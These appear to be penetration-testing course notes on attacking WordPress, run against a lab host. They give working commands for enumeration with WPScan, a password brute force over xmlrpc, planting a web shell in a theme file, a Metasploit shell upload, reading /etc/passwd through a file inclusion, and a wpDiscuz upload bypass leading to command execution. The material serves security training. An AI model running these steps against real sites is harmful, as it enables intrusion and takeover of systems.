-
Discovery & Enumeration
-
Discovery/Footprinting
-
identify a WordPress site by going to /robots.txt file
-
/wp-admin
- redirect us to the wp-login.php
-
/wp-content/plugins
- enumerate vulnerable plugins
-
/wp-content/themes
- enumerate vulnerable themes
-
Enumeration
-
identify a WordPress site by looking at the page source
-
cURL and grepping for WordPress
- curl -s http://blog.inlanefreight.local | grep WordPress
- grepping for the wp-content directory
- grep theme version number for any known vulnerabilities that affect it
- curl -s http://blog.inlanefreight.local/ | grep themes
- grep installed plugins &enumerating the versions
- curl -s http://blog.inlanefreight.local/ | grep plugins
- readme.txt to get version
- then footprint the version number
-
Enumerating Users
-
default WordPress login
-
/wp-login.php
- username enumeration
-
WPScan
-
help menu
- wpscan -h
-
pass an API token from WPVulnDB
- --api-token <token>
-
enumerate plugins & themes & users
- --enumerate
-
enumerate all plugins
- --enumerate ap
-
full request
- sudo wpscan --url http://blog.inlanefreight.local --enumerate --api-token <token>
-
Attacking
-
Login Bruteforce
-
WPScan
- wp-login (standerd login method)
-
xmlrpc
- sudo wpscan --password-attack xmlrpc -t 20 -U <username> -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.local
-
Code Execution
-
modify the PHP source code to execute system commands
-
manual
- Log in to WordPress with the credentials
- Click on Appearance on the side panel and select Theme Editor
- redirect us to the admin panel
- choose an alternate theme
- Click on Select after selecting the theme
- edit an uncommon page such as 404.php to add a web shell
- review code to find get param to execute code
- Click on Update File at the bottom to save
- interact with the web shell via the browser or using cURL (adding theme path we know befor)
- curl http://blog.inlanefreight.local/wp-content/themes/twentynineteen/404.php?0=id
-
using msf (must specify both the vhost and the IP address)
- use exploit/unix/webapp/wp_admin_shell_upload
- set rhosts <domain>
- set username <username>
- set password <password>
- set lhost <our_machine>
- set rhost <IP_target>
- set VHOST <vHost>
- show options
- exploit
- getuid
-
Vulnerable Plugins
-
mail-masta
-
suffered an unauthenticated SQL injection and a Local File Inclusion
- look at the vulnerable code for the plugin
- pl parameter allows us to include a file without any type of input validation or sanitization
- exploit this to retrieve the contents of the /etc/passwd file using cURL
- curl -s http://blog.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
-
wpDiscuz
- it intended only to allow image attachments
-
suffer from file upload bypass
- file mime type functions could be bypassed
- allowing an unauthenticated attacker to upload a malicious PHP file
- exploit script takes two parameters: -u the URL and -p the path to a valid post.
- python3 wp_discuz.py -u http://blog.inlanefreight.local -p /?p=1
- gain RCE
- use cURL to execute commands using the uploaded web shell
- curl -s http://blog.inlanefreight.local/wp-content/uploads/2021/08/uthsdkbywoxeebg-1629904090.8191.php?cmd=id